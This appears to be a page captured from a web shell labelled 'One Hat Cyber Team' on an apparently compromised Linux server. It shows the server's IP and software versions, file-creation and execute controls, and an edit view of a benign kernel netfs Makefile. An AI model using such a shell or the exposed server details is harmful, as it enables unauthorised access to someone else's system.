⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.144
Server IP:
157.245.143.252
Server:
Linux www 6.11.0-9-generic #9-Ubuntu SMP PREEMPT_DYNAMIC Mon Oct 14 13:19:59 UTC 2024 x86_64
Server Software:
nginx/1.26.0
PHP Version:
8.3.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
lib
/
modules
/
6.11.0-9-generic
/
build
/
fs
/
netfs
/
Edit File: Makefile
# SPDX-License-Identifier: GPL-2.0 netfs-y := \ buffered_read.o \ buffered_write.o \ direct_read.o \ direct_write.o \ io.o \ iterator.o \ locking.o \ main.o \ misc.o \ objects.o \ write_collect.o \ write_issue.o netfs-$(CONFIG_NETFS_STATS) += stats.o netfs-$(CONFIG_FSCACHE) += \ fscache_cache.o \ fscache_cookie.o \ fscache_io.o \ fscache_main.o \ fscache_volume.o ifeq ($(CONFIG_PROC_FS),y) netfs-$(CONFIG_FSCACHE) += fscache_proc.o endif netfs-$(CONFIG_FSCACHE_STATS) += fscache_stats.o obj-$(CONFIG_NETFS_SUPPORT) += netfs.o
Simpan